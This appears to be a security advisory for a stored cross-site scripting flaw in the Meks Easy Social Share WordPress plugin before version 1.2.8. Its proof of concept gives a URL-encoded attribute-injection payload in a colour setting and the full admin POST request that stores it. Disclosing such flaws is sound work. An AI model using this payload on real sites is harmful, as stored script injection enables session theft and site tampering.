Meks Easy Social Share < 1.2.8 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

PoC

Intercept the request made when saving the settings and put the following payload in the meks_ess_settings[color][custom_color] parameter: %23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f POST /wp-admin/options.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 634 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 option_page=meks-ess-settings&action;=update&_wpnonce=5d8e1580fd&meks;_ess_settings%5Bplatforms%5D%5B%5D=facebook&meks;_ess_settings%5Bplatforms%5D%5B%5D=twitter&meks;_ess_settings%5Bstyle%5D=1&meks;_ess_settings%5Bvariant%5D=1&meks;_ess_settings%5Bcolor%5D%5Btype%5D=brand&meks;_ess_settings%5Bcolor%5D%5Bcustom_color%5D=%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f&&meks;_ess_settings%5Blocation%5D=above&meks;_ess_settings%5Bpost_type%5D%5B%5D=post&meks;_ess_settings%5Blabel_share%5D%5Btext%5D=Share+this&meks;_ess_settings%5Blabel_share%5D%5Bactive%5D=0&meks;_ess_settings%5Blabel_share%5D%5Bactive%5D=1&submit;=Save+Changes The XSS will be triggered when viewing the settings again